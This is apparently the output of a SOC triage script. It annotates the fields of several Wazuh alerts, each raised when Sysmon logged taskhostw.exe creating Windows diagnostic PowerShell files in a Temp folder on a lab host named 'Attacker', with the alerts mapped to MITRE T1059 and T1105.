data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.1316901Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  215898
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.128 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_AdminDiagnosticHistory.ps1 CreationUtcTime: 2025-04-17 16:47:59.128 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.128
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_AdminDiagnosticHistory.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.128
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  6
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Scripting file created under Windows Temp or User folder

🧠 What happened? Scripting file created under Windows Temp or User folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.140+0000 | 🧠 MITRE: ['Execution', 'Command and Control'] – ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] [T1059] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.140+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Scripting file created under Windows Temp or User folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92200
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059', 'T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution', 'Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Command and Scripting Interpreter', 'Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.540307
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.1463736Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  215900
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.145 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_MachineWERQueue.ps1 CreationUtcTime: 2025-04-17 16:47:59.145 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.145
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_MachineWERQueue.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.145
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  6
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Scripting file created under Windows Temp or User folder

🧠 What happened? Scripting file created under Windows Temp or User folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.177+0000 | 🧠 MITRE: ['Execution', 'Command and Control'] – ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] [T1059] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.177+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Scripting file created under Windows Temp or User folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92200
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059', 'T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution', 'Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Command and Scripting Interpreter', 'Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.542974
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.1541658Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  215902
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.152 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_SyncSystemTime.ps1 CreationUtcTime: 2025-04-17 16:47:59.152 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.152
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_SyncSystemTime.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.152
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  6
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Scripting file created under Windows Temp or User folder

🧠 What happened? Scripting file created under Windows Temp or User folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.195+0000 | 🧠 MITRE: ['Execution', 'Command and Control'] – ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] [T1059] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.195+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Scripting file created under Windows Temp or User folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92200
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059', 'T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution', 'Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Command and Scripting Interpreter', 'Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.545637
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.1641125Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  215905
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.162 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_UserDiagnosticHistory.ps1 CreationUtcTime: 2025-04-17 16:47:59.162 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.162
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_UserDiagnosticHistory.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.162
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Scripting file created under Windows Temp or User folder

🧠 What happened? Scripting file created under Windows Temp or User folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.206+0000 | 🧠 MITRE: ['Execution', 'Command and Control'] – ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] [T1059] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.206+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Scripting file created under Windows Temp or User folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92200
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059', 'T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution', 'Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Command and Scripting Interpreter', 'Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.548328
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.1720606Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  215906
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.164 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_UserWERQueue.ps1 CreationUtcTime: 2025-04-17 16:47:59.164 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.164
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_UserWERQueue.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.164
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Scripting file created under Windows Temp or User folder

🧠 What happened? Scripting file created under Windows Temp or User folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.243+0000 | 🧠 MITRE: ['Execution', 'Command and Control'] – ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] [T1059] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.243+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Scripting file created under Windows Temp or User folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92200
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059', 'T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution', 'Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Command and Scripting Interpreter', 'Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.550983
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.1781228Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  215907
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.173 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\TS_DiagnosticHistory.ps1 CreationUtcTime: 2025-04-17 16:47:59.170 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.173
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\TS_DiagnosticHistory.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.170
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Scripting file created under Windows Temp or User folder

🧠 What happened? Scripting file created under Windows Temp or User folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.249+0000 | 🧠 MITRE: ['Execution', 'Command and Control'] – ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] [T1059] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.249+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

